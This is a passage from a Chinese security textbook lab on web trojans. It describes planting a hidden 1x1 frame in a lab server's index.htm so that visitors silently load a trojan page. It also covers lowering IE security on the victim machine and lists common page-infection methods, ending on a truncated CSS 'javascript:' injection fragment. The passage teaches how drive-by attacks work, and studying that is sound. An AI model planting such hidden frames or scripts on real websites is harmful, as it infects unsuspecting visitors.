如果218.198.18.95/index.htm是网页木马,那么所有访问该网站首页的人都会中木马网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的第7步:编辑wwwroot中的index.htm文件在Windows 2003上,编辑C:\Inetpub\wwwroot\index.htm文件,插入如图5-79所示的被圈部分代码图5-79 wwwroot文件夹中的index.htm文件wwwroot中index.htm文件的代码说明如表5-28所示第8步:打开浏览器在Windows XP上,打开浏览器(IE或者Firefox),地址栏输入218.198.18.93,结果如图5-80所示图5-80 访问wwwroot网站—弹出新窗口如果把width、height都设置为1(如果设置为0,访问218.198.18.93的网站时弹出的木马网页是全屏),那么在原网站的首页基本不会发生什么变化,但是,嵌入的网页(218.198.18.95/index.htm,该index.htm文件称为网页病毒或网页木马)实际上已经打开了第9步:编辑www_muma文件夹中的index.htm文件。
在Windows 2003上,编辑C:\Inetpub\www_muma\index.htm文件,插入如图5-81所示的被圈部分代码www_muma文件夹中index.htm文件的代码说明见表5-29图5-81 www_muma文件夹中index.htm文件第10步:在Windows XP上,打开IE浏览器,依次选择【工具】/【Internet选项】,打开【Internet选项】对话框,选择【安全】选项卡单击【自定义级别】按钮,出现【安全设置】对话框,在“重置为”下拉框中选择【安全级-低】,单击【重置】按钮具体过程请读者参考4.3.3小节在IE浏览器地址栏输入218.198.18.93,此时,网页木马已经在自己的电脑中创建了两个文件,如图5-82所示图5-82 网页木马创建的文件3.一些常用的挂马方式(1)框架挂马(2)body挂马
5)css中挂马body{background-image: url('javascript:document.write("。
